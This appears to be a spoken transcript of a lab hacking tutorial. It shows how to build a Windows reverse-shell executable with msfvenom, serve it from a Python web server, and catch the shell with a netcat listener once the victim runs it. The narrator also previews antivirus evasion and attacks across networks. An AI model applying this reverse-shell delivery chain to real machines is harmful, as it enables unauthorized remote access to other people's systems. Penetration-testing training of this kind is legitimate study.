So hey guys, welcome back to another video on the VR hacks. And in this video guys, we are going to talk about that how we can exploit our Windows machines with the help of Linux machines. And this time we are going to use the Netcat listeners, and with the help of that we are going to access our Windows machines via Linux. So without wasting time, we are going to start the video. And this video guys only for educational purpose, and those who are preparing for the CH practical exam, this video will be very helpful for them also. Okay, so now I will not waste your much time, so we'll just start the video. So as you can see, I already installed my Windows 7 machine, and here is my window is my Linux machine, which is Kali Linux. Okay, so you can use Ubuntu or ParrotOS also as per your hands-on experience based which you like, but I am much familiar with the Kali Linux, so I'm going to use the Linux machine here. Okay, and our target machine will be the Windows 7. So what we are going to do, we'll just simply open our command prompt, and here we'll check IP configs. As you can see, my IP is 10.0.2.15, and we'll just check to confirm that the host is up or not. So for that, I'm going to type a command ping 10.0.2.15. As you can see, we are getting the reverse connection from the target IP. So this is clear that the machine is active. So now what we are going to do to get the access of this machine, we are just simply we are going to create a payload in this. So for that, we are going to type msf venom. I'm going to give you these commands in my description. You can just simply go and type this also. Shell reverse TCP lhost will going to be your local IP, or your host or your own machine IP, and the L port you can give like 4444, 443, 2222 as per your you can give any port. Okay, and then next -x exe, and the file which you want to give the shell. I'm going to create a exe file, and I give the name of the file is shell.exe. Okay, so now what I'm going to do, I'll just let me show you. The file is already generated here. As you can see, is a shell.exe. Let me show you clearly. So that's it. So now what I'm going to do to transfer this file into my Windows machine, I'm not going to just do the drag and drop. There is another method I hope you know very well, and many of them know very well about this method. So what I'm going to do, I'm just going to create a Python server. For that, I'm going to type the python -m http.server 8000. That's it. And now what we have to do, just make sure to check the IP of your this machine, which is 10.0.2.6. That's it. And don't worry guys, this is my this machine is running on DHCP, so my IP will going to be changed. So do not try to do any activity on my machine. So this video is just only for educational purpose, that how you can exploit such machines with the help of Netcat listeners. So now what I'm going to do, I'm going to type this command, this web URL http, and the IP 10.0.2.6, and then the ports which is given 8000. That's it. So as you can see, all the directly listening for our Linux machine is listed here. So what we have to do, as you can see here, there is a file, there is a exe file also, which we created with the help of the msf venom in our Linux machine. Just simply click on the save in the desktop, as I already saved in my desktop folder. As you can see here, shell. So I'm not going to save again this file. So when you are doing in your end for the first time, you will follow the same steps. Okay, so now what I'm going to do, I'm going to just simply stop the server, and now I will type nc-nvlp and the port 443 which I given. That's it. As you can see, the listener is started on our Linux machine, and now once I will click on this shell.exe file, immediately I will get the access on my Linux machine. Let me show you how. So if I'll click on this run, that's it. And if I'll get back to my Linux machine, as you can see, I got the connection successfully on my Windows machine, which is 10.0.2.15. Let me show you the IP again. IP config, that's it, 10.0.2.50. As you can see, the IP here also, and the connected machine which we are connected with the help of the shell.exe payload is 10.0.2.15. Now to check that we are successfully connected, I'm going to just type the who I am command. So as you can see, now we are on our Windows machine, john.poc. Let me show you here also. As you can see, if I will type who am I, as you can see, John PC John, and here also I am getting the same result, John PC John. Now if I type the host name, as you can see, John PC same. And if I will type the help, as you can see, what are the help all the help command will going to see here. So let me show you something else. Let me clear. Okay, not clear. I'm going to just delete this folder, and we can also create a new folder on our victim machine. So just take an example, the Windows machine is my victim machine. So what I'm going to do now, I'm going to create just a simple directory. So for that I'm going to type mkdir, like I want to create a text file. So for examples I'm going to give a text name which is shell.txt. That's it. We'll wait for a second. As you can see, a folder name created in the shell.txt. So now what I have to do, I want to create another folder, mkdir hello. Okay, that's it. As you can see, a name folder hello has been created on our desktop. Now I want to put this hello folder into shell.txt. So for that I'm going to type mv hello shell.txt. That's it. Okay, so it's not taking. mv is not a recognized command. Okay, let me just clear this. So now if I type cd, that's it, cd sd card, not sd card, ls-la, ls is not recognized. Maybe this is not taking this all these commands, but as you can see guys, we have successfully hacked our Windows machines. And apart from this, we can also take the root access also. For that I'm going to cover that part in my next video. But hope you enjoy this video and hope you understand that how we can access Windows machine with the help of just a simple payload. Now in my next video I'm going to I'm going to cover a topic in which we are going to use the port forwarding method. Port forwarding basically it's a method in which that if your victim is not connected to your network also guys, you can still hack their machine with the help of such payloads. And to not to get detected by the antivirus, there are also methods how to encrypt the payloads, and which help you to bypass the antivirus, so which will help you to get the victim machine access easily. So as of now, that's it guys. We will meet in next video. For now, that's it.